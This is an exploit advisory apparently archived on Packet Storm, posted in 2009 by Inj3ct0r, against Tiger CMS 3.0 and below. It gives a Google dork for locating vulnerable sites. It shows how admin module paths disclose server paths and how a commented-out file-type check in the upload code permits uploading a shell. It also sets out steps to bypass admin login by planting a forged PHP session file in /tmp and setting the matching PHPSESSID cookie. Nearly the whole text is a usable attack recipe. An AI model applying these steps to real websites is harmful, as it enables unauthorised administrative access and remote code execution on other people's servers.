what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Tiger CMS 3.0 Administrative Bypass

Tiger CMS 3.0 Administrative Bypass
Posted Aug 26, 2009
Authored by Inj3ct0r | Site Inj3ct0r.com

Tiger CMS versions 3.0 and below suffer from an administrative bypass vulnerability that allows shell access.

tags | exploit, shell, bypass
SHA-256 | 8de5444c56f8861a2ca6b56d04cc050987567d2be3dbbeb2ac0b6ce66a9519da

Tiger CMS 3.0 Administrative Bypass

Change Mirror Download
==========================================
TIGER CMS <= v3.0 Bypass admin / get shell
==========================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com


Product : TIGER CMS
Vesrion : v3.0
Site : http://tigercms.com/
Dork:"Powered by TIGER CMS v3.0"


Path Disclosure

Sample : http://bobruisk.name/admin/engine/modules/uploads/

Usage:


http://site.com/path/admin/engine/modules/[module_name]

Standard modules, which are suitable for this purpose:

uploads
content
links
metatags
news
pass
templates

Filling an arbitrary file
Unclear why, but the fault of all - 2 default lines.

PHP code:

$type = strtolower(substr($filename, 1 + strrpos($filename, ".")));
//$types_ok = array("jpg", "bmp", "gif", "png");
//if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Íåâåðíûé ôîðìàò ôàéëà.");

$new_name = 'tiger-'.time().'.'.$type;
$a = copy($file, "../uploads/".$new_name);
$path_all = getenv("SERVER_NAME");

Example:

http://site.com/path/admin/?task=uploads&sub_task=add


Bypass authentication to the admin.

Need:

Shell on the neighboring site
Access to write to the / tmp

Vulnerable code:

admin/login/login2.php

PHP code:

$_SESSION['user_id_admin'] = $id_admin;
$Admins->SuccessAuth($login);


For a successful login, we will need to login admin. Venture to suggest that it is "admin"

Represents sesiyu:

Name: sess_0526152ea0fed5dbbfca86639e0f6fa7

Contents:

user_id_admin | s: 1: "1";

Keeping in / tmp
Do not forget to right 777!
Next forges cookies in your browser:

PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7


Go:

http://site.com/path/admin/, successfully passed authentication pour shell as described above.


ThE End =] Visit my proj3ct :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~ - [ [ : Inj3ct0r : ] ]
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close